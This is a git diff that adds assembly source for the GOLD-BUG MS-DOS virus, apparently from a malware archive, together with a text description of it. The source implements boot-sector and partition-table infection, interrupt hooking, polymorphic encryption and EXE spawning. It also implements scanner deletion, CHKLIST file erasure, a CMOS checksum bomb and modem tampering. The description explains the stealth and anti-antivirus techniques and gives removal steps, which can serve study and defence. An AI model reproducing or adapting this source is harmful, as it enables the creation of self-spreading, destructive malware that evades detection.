+WRITE_W_HANDLE equ 04000h +CLOSE_HANDLE equ 03e00h +UNLINK equ 04100h +FILE_ATTRIBUTES equ 04300h +RESIZE_MEMORY equ 04a00h +QUERY_FREE_HMA equ 04a01h +ALLOCATE_HMA equ 04a02h +EXEC_PROGRAM equ 04b00h +GET_ERROR_LEVEL equ 04d00h +TERMINATE_W_ERR equ 04c00h +RENAME_A_FILE equ 05600h +LSEEK_TO_END equ 04202h +CREATE_NEW_FILE equ 05b00h +RESIDENT_LENGTH equ 068h +PARAMETER_TABLE equ 005f1h +MAX_PATH_LENGTH equ 00080h +EXE_HEADER_SIZE equ 020h +NEW_EXE_HEADER equ 00040h +NEW_EXE_OFFSET equ 018h +PKLITE_SIGN equ 'KP' +PKLITE_OFFSET equ 01eh +NO_OF_COM_PORTS equ 004h +WINDOWS_BEGIN equ 01605h +WINDOWS_END equ 01606h +ERROR_IN_EXE equ 0000bh +IF POLYMORPHIC +FILE_SIGNATURE equ 07081h +XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES +FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES +FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE) +SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code)) +BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code)) +ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code)) +ELSE +FILE_SIGNATURE equ 0070eh +ENDIF +IF MODEM_CODE +STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string)) +ENDIF +IF EXECUTE_SPAWNED +EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table)) +ENDIF +DH_OFFSET equ byte ptr ((offset dh_value)-(offset initialize_boot)+TWO_BYTES) +ONE_NIBBLE equ 004h +ONE_BYTE equ 001h +TWO_BYTES equ 002h +THREE_BYTES equ 003h +FOUR_BYTES equ 004h +FIVE_BYTES equ 005h +FIVE_BITS equ 005h +EIGHT_BYTES equ 008h +USING_HARD_DISK equ 080h +KEEP_CF_INTACT equ 002h +CMOS_CRC_ERROR equ 02eh +CMOS_PORT equ 070h +REMOVE_NOP equ 001h +CR equ 00dh +LF equ 00ah +INT3_INCBX equ 043cch +INC_BL equ 0c3feh +INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL +JMP_NO_SIGN equ 079h +JMP_NOT_ZERO equ 075h +JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO +CLI_PUSHCS equ 00efah + +;----------------------------------------------------------------------------- + +video_seg segment at 0c000h + org 00000h +original_int_10 label word +video_seg ends + +;----------------------------------------------------------------------------- + +io_seg segment at 00070h + org 00893h +original_2f_jmp label word +io_seg ends + +;----------------------------------------------------------------------------- + + org COM_OFFSET +com_code: + +;----------------------------------------------------------------------------- + + IF POLYMORPHIC +first_decode proc near +serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE + org $-REMOVE_NOP + org $-FIVE_BYTES + jmp load_it + org $+TWO_BYTES +rotated_code: int SINGLE_BYTE_INT + into + adc al,0d4h +incbl_incbx: inc bl +first_jmp: jnz serial_number + add bx,si + jns serial_number +first_decode endp + +;----------------------------------------------------------------------------- + + IF DOUBLE_DECRIPT +second_decode proc near + push si +get_next_byte: lodsw + add bx,ax + inc bx + xor byte ptr ds:[si+SECOND_UNDO_OFF],bl + org $-REMOVE_NOP + dec si +second_jmp: jns get_next_byte + pop si +second_decode endp + ENDIF + ENDIF + +;----------------------------------------------------------------------------- + +com_start proc near + IF MULTIPARTITE + push cs + pop es + call full_move_w_si + mov ds,cx + cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL] + jne dont_set_int + mov di,VIRGIN_INT_13_B + call set_both_ints + push cs + pop es + ENDIF +dont_set_int: IF CHECK_FOR_8088 + mov cl,RESIDENT_LENGTH + mov al,high(RESIZE_MEMORY) + shl ax,cl + mov bx,cx + int DOS_INT + ELSEIF MULTIPARTITE + mov bx,RESIDENT_LENGTH + mov ah,high(RESIZE_MEMORY) + int DOS_INT + ENDIF + IF EXECUTE_SPAWNED + pusha + call from_com_code+RELATIVE_OFFSET + popa + push cs + pop ds + push cs + pop es + cmpsw + mov dx,si + sub si,EXEC_SUBTRACT + org $-REMOVE_NOP + mov bx,PARAMETER_TABLE + mov di,bx + mov ax,EXEC_PROGRAM +set_table: scasw + movsb + scasb + mov word ptr ds:[di],ds + je set_table + int DOS_INT + mov ah,high(GET_ERROR_LEVEL) + int DOS_INT + mov ah,high(TERMINATE_W_ERR) + ELSEIF MULTIPARTITE + call from_com_code+RELATIVE_OFFSET + mov ax,TERMINATE_W_ERR + ENDIF + IF MULTIPARTITE + int DOS_INT + ELSE + jmp boot_load + ENDIF +com_start endp + +;----------------------------------------------------------------------------- + +interrupt_21 proc far + pushf + pusha + push ds + push es + mov di,dx + push ds + pop es + cld + mov cx,MAX_PATH_LENGTH + IF MULTIPARTITE + mov si,offset file_name+RELATIVE_OFFSET + ENDIF + IF READING_STEALTH OR DEFLECT_DELETE + mov bx,ax + ENDIF + cmp ax,EXEC_PROGRAM + IF READING_STEALTH + je start_process + cmp ah,high(OPEN_W_HANDLE) + ENDIF + IF DEFLECT_DELETE + je start_process + cmp ah,high(UNLINK) + ENDIF + jne a_return +start_process: xor ax,ax +copy_name: IF MULTIPARTITE + mov bl,byte ptr ds:[di] + mov byte ptr cs:[si],bl + inc si + ENDIF + scasb + loopne copy_name + std + scasw + IF MULTIPARTITE + mov byte ptr cs:[si-FIVE_BYTES],al + ENDIF + mov al,'E' + scasw + jne a_return + mov ah,'X' + scasw + jne a_return + IF MULTIPARTITE + push ds + ENDIF + pusha + call open_close_file + IF SAME_FILE_DATE + mov word ptr cs:[new_time+ONE_BYTE+RELATIVE_OFFSET],cx + mov word ptr cs:[new_date+ONE_BYTE+RELATIVE_OFFSET],dx + ENDIF + or si,si + IF MULTIPARTITE + jnz large_exe_file + cmp word ptr ds:[si],FILE_SIGNATURE + je our_kind + IF INFECT_RANDOM + xor di,bp + jpo our_kind + ENDIF + cmp word ptr ds:[si+NEW_EXE_OFFSET],NEW_EXE_HEADER + jb test_if_open + cmp word ptr ds:[si+PKLITE_OFFSET],PKLITE_SIGN + je test_if_open + ELSE + jz our_kind + ENDIF +large_exe_file: popa + IF MULTIPARTITE + pop ds + ENDIF + IF ANTI_ANTIVIRUS + mov al,'N' + scasb + ja a_return + mov al,'A' + scasb + jne a_return + pop es + pop ds + popa + IF READING_STEALTH OR DEFLECT_DELETE + cmp ah,high(EXEC_PROGRAM) + jne opened_file + ENDIF + popf + IF CMOS_BOMB + mov al,CMOS_CRC_ERROR + out CMOS_PORT,ax + ENDIF + IF DELETE_SCANNERS + mov ah,high(UNLINK) + jmp short old_int_10_21 + ELSE + mov al,ERROR_IN_EXE + stc + retf KEEP_CF_INTACT + ENDIF + ELSE + jmp short a_return + ENDIF +our_kind: popa + IF MULTIPARTITE + pop ds +error_in_copy: inc di + xchg byte ptr ds:[di],ch + mov ax,OPEN_W_HANDLE+DENYNONE + int INT_21_IS_NOW + mov bx,ax + jnc close_it + mov byte ptr ds:[di],ch +jmp_a_return: jmp short a_return +close_it: call force_close + ENDIF +a_return: pop es + pop ds + popa +opened_file: popf +old_int_10_21: jmp far ptr original_int_10 + IF MULTIPARTITE +test_if_open: popa + pop ds + IF READING_STEALTH OR DEFLECT_DELETE + cmp bh,high(EXEC_PROGRAM) + jne error_in_copy + ENDIF +drive_letter: sub al,USING_HARD_DISK + jns error_in_copy + mov ax,GET+FILE_ATTRIBUTES + int INT_21_IS_NOW + mov ah,high(RENAME_A_FILE) + pusha + mov di,offset file_name+RELATIVE_OFFSET + push cs + pop es + int INT_21_IS_NOW +set_attribs: popa + int INT_21_IS_NOW + mov ah,high(CREATE_NEW_FILE) + int INT_21_IS_NOW + jc error_in_copy + mov bx,ax + mov ax,SET+FILE_ATTRIBUTES + pusha + push ds + push cs + pop ds + or cl,SYSTEM + mov dx,offset file_name+RELATIVE_OFFSET + int INT_21_IS_NOW + IF ANTI_ANTIVIRUS + mov dx,offset fcb_name+RELATIVE_OFFSET + mov ah,high(DELETE_W_FCB) + int INT_21_IS_NOW + ENDIF + xor di,di + mov ax,SCRATCH_AREA + mov es,ax + mov ds,ax + call full_move + call move_some_more + IF POLYMORPHIC + xor si,si + mov cx,word ptr ds:[si+FILE_LEN_OFFSET] + org $-REMOVE_NOP + IF DOUBLE_DECRIPT + pusha +set_second: add al,byte ptr cs:[si+RES_OFFSET] + inc ax + xor byte ptr ds:[si+SECOND_UNDO_OFF+TWO_BYTES],al + org $-REMOVE_NOP + inc si + loop set_second + popa + ENDIF + mov ax,cx + pusha + xor bx,bx + mov bl,byte ptr ds:[si+XOR_SWAP_OFFSET] + org $-REMOVE_NOP +set_first: xor word ptr ds:[bx],ax + inc bx + loop set_first + popa + ELSE +file_length: mov cx,NULL + ENDIF + mov ah,high(WRITE_W_HANDLE) + cwd + int INT_21_IS_NOW + IF SAME_FILE_DATE + mov ax,SET+FILE_DATE_TIME +new_time: mov cx,NULL +new_date: mov dx,NULL + call do_int21_close + ELSE + call force_close + ENDIF + pop ds + jmp short set_attribs + ENDIF +interrupt_21 endp + +;----------------------------------------------------------------------------- + +open_close_file proc near + mov ax,OPEN_W_HANDLE+DENYNONE + xor cx,cx + int INT_21_IS_NOW + jc more_returns + mov bx,ax + IF MULTIPARTITE + mov dx,HEADER_SEGMENT + mov ds,dx + ENDIF + IF MODEM_CODE + IF MULTIPARTITE + mov dl,NO_OF_COM_PORTS + ELSE + mov dx,NO_OF_COM_PORTS + ENDIF +scan_coms: dec dx + js no_more_coms + mov ax,GET_PORT_STATUS + int SERIAL_INT + xor al,DELTA_RI+CTS+DSR + and al,DELTA_RI+CTS+DSR+CD + jnz scan_coms + mov si,offset string+STRING_LENGTH-ONE_BYTE+RELATIVE_OFFSET + mov cl,STRING_LENGTH +output_data: lods byte ptr cs:[si] + mov ah,high(WRITE_TO_PORT) + int SERIAL_INT + loop output_data + ENDIF +no_more_coms: IF MULTIPARTITE + mov cl,EXE_HEADER_SIZE + mov ah,high(READ_W_HANDLE) + cwd + int INT_21_IS_NOW + xor cx,cx + ELSE + xor dx,dx + ENDIF + mov ax,LSEEK_TO_END + int INT_21_IS_NOW + IF MULTIPARTITE + IF POLYMORPHIC + mov word ptr cs:[FILE_LEN_OFFSET+RES_OFFSET],ax + ELSE + mov word ptr cs:[file_length+ONE_BYTE+RELATIVE_OFFSET],ax + ENDIF + ENDIF + inc ah + cmp ax,MIN_FILE_SIZE+PSP_SIZE + adc dx,cx + mov si,dx + IF SAME_FILE_DATE + mov ax,GET+FILE_DATE_TIME +do_int21_close: int INT_21_IS_NOW + ENDIF +force_close: mov ah,high(CLOSE_HANDLE) + int INT_21_IS_NOW +more_returns: ret +open_close_file endp + +;----------------------------------------------------------------------------- + +full_move_w_si proc near + IF POLYMORPHIC +swap_incbx_bl: xor word ptr ds:[si+BL_BX_OFFSET],INCBX_INCBL_XOR + org $-REMOVE_NOP + xor byte ptr ds:[si+BL_BX_OFFSET+TWO_BYTES],JNS_JNZ_XOR + org $-REMOVE_NOP + ENDIF + stc +full_move_w_di: mov di,RES_OFFSET +full_move: call move_code +move_code: jc move_some_more + mov si,RES_OFFSET + IF POLYMORPHIC + IF CHECK_FOR_8088 + mov cl,ONE_NIBBLE + ror word ptr cs:[si+ROTATED_OFFSET],cl + org $-REMOVE_NOP + ELSE + ror word ptr cs:[si+ROTATED_OFFSET],ONE_NIBBLE + org $-REMOVE_NOP + ENDIF + ENDIF +move_some_more: mov cx,SECTOR_SIZE + pushf + cld + rep movs byte ptr es:[di],cs:[si] + popf + stc + ret +full_move_w_si endp + +;----------------------------------------------------------------------------- + + IF ANTI_ANTIVIRUS + org PART_OFFSET-ONE_BYTE +fcb_name db DEFAULT_DRIVE + ENDIF + +;----------------------------------------------------------------------------- + + org PART_OFFSET +boot_code: + +;----------------------------------------------------------------------------- + +initialize_boot proc near + IF ANTI_ANTIVIRUS + db 'CHKLIST????' + cli + push cs + mov si,BOOT_OFFSET-SECTOR_SIZE + pop ss + mov sp,si + sti + push cs + org PART_OFFSET+DESCRIPTOR_OFF + db high(DESCRIPTOR) + pop ds + mov cx,COM_CODE_SECTOR + pushf + push cs + push BOOT_OFFSET + mov ax,READ_A_SECTOR + ELSE + cli + push cs + mov si,BOOT_OFFSET-SECTOR_SIZE + pop ss + mov sp,si + sti + pushf + push cs + push BOOT_OFFSET + push cs + mov cx,COM_CODE_SECTOR + mov ax,READ_A_SECTOR + org PART_OFFSET+DESCRIPTOR_OFF + db high(DESCRIPTOR) + pop ds + ENDIF + push cs + pop es +dh_value: mov dx,NULL + mov bx,dx + xor dh,al + shr dx,1 + mov dh,bh + push dx + mov bx,si + push ax + int DISK_INT + pop ax + mov di,VIDEO_INT_ADDR + mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_BOOT+ONE_BYTE + call get_n_set_int+ONE_BYTE + mov bx,offset low_code-TWO_BYTES+RELATIVE_OFFSET + cmp dx,LOW_JMP_10 + je try_this_out + cmp byte ptr ds:[VIDEO_MODE],MONOCHROME + jae try_this_out + mov di,DISK_INT_ADDR + IF MULTIPARTITE + call set_both_ints + ELSE + mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET + call get_n_set_int+ONE_BYTE + mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET + call set_interrupt + ENDIF + mov ch,high(COLOR_VIDEO_MEM) + mov bx,offset high_code+RELATIVE_OFFSET +try_this_out: push cx + push bx + mov es,cx + call full_move_w_si + retf +initialize_boot endp + +;----------------------------------------------------------------------------- + +high_code proc near + mov dx,offset int_10_start+RELATIVE_OFFSET + mov bx,LOW_JMP_10-FAR_JUMP_OFFSET + call set_int_10_21 + mov bx,VIDEO_INT_ADDR-SET_INT_OFFSET +low_code: mov es,cx + mov cl,OLD_BOOT_SECTOR + mov dx,LOW_JMP_10 + call set_interrupt + mov bx,BOOT_OFFSET + pop dx + int DISK_INT + xor dh,dh + mov cl,BOOT_SECTOR + mov ax,WRITE_A_SECTOR +high_code endp + +;----------------------------------------------------------------------------- + +interrupt_13 proc far +int_13_start: IF MULTIPARTITE + mov byte ptr cs:[drive_letter+ONE_BYTE+RELATIVE_OFFSET],dl + ENDIF + cmp cx,BOOT_SECTOR + jne no_boot_sector + cmp ah,high(READ_A_SECTOR) + jne no_boot_sector + cmp dx,HD_0_HEAD_0 + jbe reread_boot +no_boot_sector: int NEW_INT_13_LOOP + jmp short return_far +reread_boot: int NEW_INT_13_LOOP + jc return_far + pusha + push ds + push es + pop ds +check_old_boot: mov ax,READ_A_SECTOR + xor dh,dh + mov cl,OLD_BOOT_SECTOR + IF ANTI_ANTIVIRUS + cmp word ptr ds:[bx],'HC' + ELSE + cmp word ptr ds:[bx],CLI_PUSHCS + ENDIF + je read_old_boot + test dl,USING_HARD_DISK + jnz encode_hd + cmp word ptr ds:[bx+DESCRIPTOR_OFF-ONE_BYTE],DESCRIPTOR + jne time_to_leave + mov dh,al + pusha + int NEW_INT_13_LOOP + cmp byte ptr ds:[bx],ch + popa + pushf + pusha + xor dh,dh + mov cl,al + int NEW_INT_13_LOOP + popa + popf + jne time_to_leave +encode_hd: mov ah,high(WRITE_A_SECTOR) + push ax + int NEW_INT_13_LOOP + pop ax + jc time_to_leave + mov di,bx + call move_code + mov cl,COM_CODE_SECTOR + IF POLYMORPHIC + xor byte ptr ds:[bx+XOR_SWAP_OFFSET],dh + org $-REMOVE_NOP + jo dont_flip_it + xchg word ptr ds:[bx+ROTATED_OFFSET],ax + org $-REMOVE_NOP + xchg ah,al + xchg word ptr ds:[bx+ROTATED_OFFSET+TWO_BYTES],ax + org $-REMOVE_NOP + xchg word ptr ds:[bx+ROTATED_OFFSET],ax + org $-REMOVE_NOP + ENDIF +dont_flip_it: pusha + int NEW_INT_13_LOOP + popa + mov di,bx + call move_some_more + mov byte ptr ds:[bx+DH_OFFSET],dh + org $-REMOVE_NOP + mov dh,cl + inc cx + int NEW_INT_13_LOOP + jmp short check_old_boot +read_old_boot: mov dh,byte ptr ds:[bx+DH_OFFSET] + org $-REMOVE_NOP + int NEW_INT_13_LOOP +time_to_leave: pop ds + popa + clc +return_far: retf KEEP_CF_INTACT +interrupt_13 endp + +;----------------------------------------------------------------------------- + +interrupt_2f proc far + pusha + push ds + push es + push offset return_to_2f+RELATIVE_OFFSET + xor cx,cx + mov ds,cx + mov bx,SAVE_INT_CHAIN-SET_INT_OFFSET + cmp ax,WINDOWS_END + jne try_another + les dx,dword ptr ds:[bx+SET_INT_OFFSET] + jmp short set_13_chain +try_another: cmp ax,WINDOWS_BEGIN + jne another_return + mov di,VIRGIN_INT_13_B + call get_n_set_int+ONE_BYTE + les dx,dword ptr ds:[BIOS_INT_13*ADDR_MUL] +set_13_chain: mov ax,READ_A_SECTOR + call get_set_part + mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET + call set_interrupt + mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET) + call set_interrupt + mov ah,high(WRITE_A_SECTOR) +interrupt_2f endp + +;----------------------------------------------------------------------------- + +get_set_part proc near + pusha + push es + mov bx,SCRATCH_AREA + mov es,bx + mov dx,HD_0_HEAD_0 + inc cx + int NEW_INT_13_LOOP + mov ax,READ_A_SECTOR + int DISK_INT + pop es + popa +another_return: ret +get_set_part endp + +;----------------------------------------------------------------------------- + +return_to_2f proc near + pop es + pop ds + popa + jmp far ptr original_2f_jmp +return_to_2f endp + +;----------------------------------------------------------------------------- + +interrupt_10 proc far +int_10_start: pushf + pusha + push ds + push es + push offset a_return+RELATIVE_OFFSET +from_com_code: xor bx,bx + mov ds,bx + or ah,ah + jz set_10_back + mov ax,QUERY_FREE_HMA + int MULTIPLEX_INT + cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE) + jb another_return + mov ax,ALLOCATE_HMA + int MULTIPLEX_INT + clc + call full_move_w_di + mov dx,offset int_13_start+RELATIVE_OFFSET + call set_13_chain + mov bx,VIRGIN_INT_2F-SET_INT_OFFSET + mov dx,offset interrupt_2f+RELATIVE_OFFSET + call set_interrupt + cmp word ptr ds:[LOW_JMP_10],cx + je set_10_back + push es + push es + mov di,DOS_INT_ADDR + mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET + call get_n_set_int+ONE_BYTE + pop ds + mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE + call set_interrupt + mov ds,cx + mov ax,DOS_SET_INT+DOS_INT + mov dx,LOW_JMP_21 + int INT_21_IS_NOW + pop es + mov bx,dx + mov dx,offset interrupt_21+RELATIVE_OFFSET + mov word ptr ds:[bx],0b450h + mov word ptr ds:[bx+TWO_BYTES],0cd19h + mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW + call set_int_10_21 +set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE + mov bx,LOW_JMP_10-FAR_JUMP_OFFSET +interrupt_10 endp + +;----------------------------------------------------------------------------- + +get_n_set_int proc near + les dx,dword ptr cs:[di] + jmp short set_interrupt +set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP +set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx + mov word ptr ds:[bx+CHANGE_SEG_OFF],es + ret +get_n_set_int endp + +;----------------------------------------------------------------------------- + + IF MULTIPARTITE +set_both_ints proc near + mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET + call get_n_set_int+ONE_BYTE + mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET + jmp short set_interrupt +set_both_ints endp + ENDIF + +;----------------------------------------------------------------------------- + + IF EXECUTE_SPAWNED +exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB + ENDIF + +;----------------------------------------------------------------------------- + + IF MODEM_CODE + org PART_OFFSET+001f3h +string db CR,'1O7=0SLMTA' + ENDIF + +;----------------------------------------------------------------------------- + + org PART_OFFSET+SECTOR_SIZE-TWO_BYTES +partition_sig dw 0aa55h + +;----------------------------------------------------------------------------- + + org PART_OFFSET+SECTOR_SIZE+TWO_BYTES +file_name db 'DA',027h,'BOYS.COM',NULL + +;----------------------------------------------------------------------------- + + org PARAMETER_TABLE + dw NULL,NULL,NULL,NULL,NULL,NULL,NULL + db NULL + +;----------------------------------------------------------------------------- + + IFE MULTIPARTITE +boot_load proc near + push cs + pop es + call full_move_w_si + mov ds,cx + cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL] + jne dont_set_intcd + lds dx,dword ptr ds:[VIRGIN_INT_13_B] + mov ax,DOS_SET_INT+NEW_INT_13_LOOP + int DOS_INT +dont_set_intcd: mov ah,high(GET_DEFAULT_DR) + int DOS_INT + call from_com_code+RELATIVE_OFFSET + mov ax,TERMINATE_W_ERR + int DOS_INT +boot_load endp + ENDIF + +;----------------------------------------------------------------------------- + + IF POLYMORPHIC +load_it proc near + mov word ptr ds:[si],FILE_SIGNATURE + mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF + push bx + xor ax,ax + cli + out 043h,al + in al,040h + mov ah,al + in al,040h + sti + push ax + and ax,0001eh + mov bx,ax + mov ax,word ptr ds:[bx+two_byte_table] + mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax + org $-REMOVE_NOP + pop ax + and ax,003e0h + mov cl,FIVE_BITS + shr ax,cl + mov bx,ax + mov al,byte ptr ds:[bx+one_byte_table] + xor al,low(INC_BL) + mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al + pop bx + jmp com_start +load_it endp + +;----------------------------------------------------------------------------- + +two_byte_table: mov al,0b2h + xor al,0b4h + and al,0d4h + les ax,dword ptr ds:[si] + les cx,dword ptr ds:[si] + les bp,dword ptr ds:[si] + adc al,0d4h + and al,084h + adc al,084h + adc al,024h + add al,084h + add al,014h + add al,024h + test dl,ah + repz stc + repnz stc + +;----------------------------------------------------------------------------- + +one_byte_table: int SINGLE_BYTE_INT + into + daa + das + aaa + aas + inc ax + inc cx + inc dx + inc bp + inc di + dec ax + dec cx + dec dx + dec bp + dec di + nop + xchg cx,ax + xchg dx,ax + xchg bp,ax + xchg di,ax + cbw + cwd + lahf + scasb + scasw + xlat + repnz + repz + cmc + clc + stc + ENDIF + +;----------------------------------------------------------------------------- + +gold_bug endp +cseg ends +end com_code diff --git a/MSDOS/Virus.MSDOS.Unknown.gold-bug.txt b/MSDOS/Virus.MSDOS.Unknown.gold-bug.txt new file mode 100644 index 00000000..6b0bb6c1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gold-bug.txt @@ -0,0 +1,161 @@ +Virus Name: GOLD-BUG +Aliases: AU, GOLD, GOLD-FEVER, GOLD-MINE +V Status: New, Research +Discovery: January, 1994 +Symptoms: CMOS checksum failure; Creates files with no extension; Modem + answers on 7th ring; BSC but it is hidden; Most virus scanners + fail to run or are Deleted; CHKLIST.??? files deleted. +Origin: USA +Eff Length: 1,024 Bytes +Type Code: SBERaRbReX - Spawning Color Video Resident and Extended HMA + Memory Resident Boot-Sector and Master-Sector Infector +Detection Method: None +Removal Instructions: See Below + +General Comments: + + GOLD-BUG is a memory-resident multipartite polymorphic stealthing + boot-sector spawning anti-antivirus virus that works with DOS 5 and + DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the + GOLD-BUG virus is run, it determines if it is running on an 80186 or + better, if not it will terminate and not install. If it is on an + 80186 or better it will copy itself to the partition table of the hard + disk and remain resident in memory in the HMA (High Memory Area) only + if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no + infection will occur. The old partition table is moved to sector 14 + and the remainder of the virus code is copied to sector 13. The virus + then executes the spawned associated file if present. INT 13 and + INT 2F are hooked into at this time but not INT 21. The spawning + feature of this virus is not active now. + + When the computer is rebooted, the virus goes memory resident in the + color video memory. Also at this time the GOLD-BUG virus removes + itself from the partition table and restores the old one back. Unlike + other boot-sector infectors, it does not use the top of memory to + store the code. CHKDSK does not show a decrease in available memory. + At this time it only hooks INT 10 and monitors when the HMA becomes + available. Once DOS moves into the HMA, then GOLD-BUG moves into the + HMA at address FFFF:FB00 to FFFF:FFFF. If the HMA never becomes + available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the + CONFIG.SYS, then the virus clears itself from the system memory when + the computer changes into graphics mode. If it moves to the HMA, it + hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the + partition table. The GOLD-BUG virus also has some code that stays + resident in the interrupt vector table to always make the HMA + available to the virus. The full features of the virus are now + active. + + The GOLD-BUG virus will infect the boot sector of 1.2M diskettes. + The virus copies itself to the boot sector of the diskette and moves + a copy of the boot sector to sector 28 and the remainder of the code + is copied to sector 27. These are the last 2 sectors of the 1.2M disk + root directory. If there are file entries on sector 27 or 28 it will + not overwrite them with the virus code. It will infect 1.2M disks in + drive A: or B: If a clean boot disk is booted from drive A: and you + try to access C: you will get an invalid drive specification. + + The boot-sector infection is somewhat unique. If the computer is + booted with a disk that contains the GOLD-BUG virus, it will remain in + video memory until the HMA is available and then infect the hard disk. + Also at this time, it will remove itself from the 1.2M disk. The + virus will never infect this disk again. It makes tracking where you + got the virus from difficult in that your original infected disk is + not infected anymore. + + If an .EXE file less than 64K and greater then 1.5K is executed, + GOLD-BUG will randomly decide to spawn a copy of it. The .EXE file is + renamed to the same file name with no extension, ie. CHKDSK.EXE + becomes CHKDSK. The original file attributes are then changed to + SYSTEM. An .EXE file with the same name is created. This .EXE file + has the same length, file date and attributes as the original .EXE + file. This spawning process will not make a copy on a diskette + because it might be write protected and be detected; but it will make + a spawn .EXE file on a network drive. When a spawned file is created, + CHKLIST.??? of the current directory is also deleted. The .EXE file + that is created is actually a .COM file; it has no .EXE header. + + The GOLD-BUG virus is very specific as to what type of .EXE files it + will spawn copies. It will not spawn any Windows .EXE files or any + other .EXE files the use the new extended .EXE header except those + that use the PKLITE extended .EXE header. This way all Windows + programs will continue to run and the virus will still be undetected. + + The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates + only has 2 bytes that remain constant. It can mutate into 128 + different decription patterns. It uses a double decription technique + that involves INT 3 that makes it very difficult to decript using a + debugger. The assembly code allowed for 512 different front-end + decripters. Each of these can mutate 128 different ways. + + The GOLD-BUG virus incorporates an extensive steathing technique. Any + time the hard disk partition table or boot sector of an infected + diskette is examined, the copy of the partition table or boot sector + is returned. If a spawned .EXE file is opened to be read or executed; + the GOLD-BUG virus will redirect to the original file. Windows 3.1 + will detect a resident boot-sector virus if the "Use 32 Bit Access" is + enabled on the "Virtual Memory" option. GOLD-BUG will disconnect + itself from the INT 13 chain when Windows installs and reconnect when + Windows uninstalles to avoid being detected. When Windows starts, the + GOLD-BUG virus will copy the original hard disk partition table back. + When Windows ends, the GOLD-BUG virus will reinfect the partition + table. + + The GOLD-BUG virus also has an extensive anti-antivirus routine. It + can install itself with programs like VSAFE.COM and DISKMON.EXE + resident that monitor changes to the computer that are common for + viruses. It writes to the disk using the original BIOS INT 13 and not + the INT 13 chain that these types of programs have hooked into. It + hooks into the bottom of the interrupt chain rather than changing and + hooking interrupts; very similar to the tunneling technique. If the + GOLD-BUG virus is resident in memory, any attempts to run most virus + scanners will be aborted. GOLD-BUG stops any large .EXE file + (greater than 64k) with the last two letters of "AN" to "AZ". It will + stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE, + etc., etc. The SCAN program will either be deleted or an execution + error will return. Also, GOLD-BUG will cause a CMOS checksum failure + to happen next time the system boots. GOLD-BUG also erases + "CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an + internal checksum on themselves will not detect any changes. The + Thunder Byte Antivirus programs contain a partition table program that + claims it can detect all partition table viruses. GOLD-BUG rides + right through the ThunderByte partition virus checker. + + The GOLD-BUG virus detects a modem. If you received an incoming call + on the modem line, GOLD-BUG will output a string that will set the + modem to answer on the seventh ring. + + If a program tries to erase the infected .EXE file, the original + program and not the infected .EXE file is erased. + + The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the + decripted code. The virus gets it name from "AU", the chemical + element "GOLD". The text string "CHKLIST????" is actually executable + code. + + The GOLD-BUG virus has two companion viruses that it works with. The + DA'BOYS virus is also a boot-sector infector. It is possible to have + a diskette with two boot-sector viruses. GOLD-BUG hides the presence + of the DA'BOYS virus from the Windows 3.1 startup routine. GOLD-BUG + removes the DA'BOYS virus from the INT 13 chain at the start of + Windows and restores it when Windows ends. The GOLD-BUG virus works + with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in + the HMA for the XYZ virus so it can load as well. + + To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the + CONFIG.SYS, then reboot. Once the system comes up again, reboot from + a clean boot disk. The Virus has now removed itself from the + partition table and memory. With the ATTRIB command check for files + with the SYSTEM bit set that don't have any extension. Delete the + .EXE file associated with the SYSTEM file. Using ATTRIB remove the + SYSTEM attribute. Rename the file with no extension to an .EXE file. + Format each diskette or run SYS to remove the virus from the boot + sector of each 1.2M disk. Any spawned .EXE files copied to diskette + need to be deleted. + + Several variations of this virus can exist. The assembly code allowed + for 14 features to be turned on or off: Delete Scanners, Check for + 8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading + Stealth, Same File Date, Double Decription, Execute Spawned, Modem + Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M + Diskette Infection. Some of these features can be disabled and more + code added to change the characteristics of this virus. 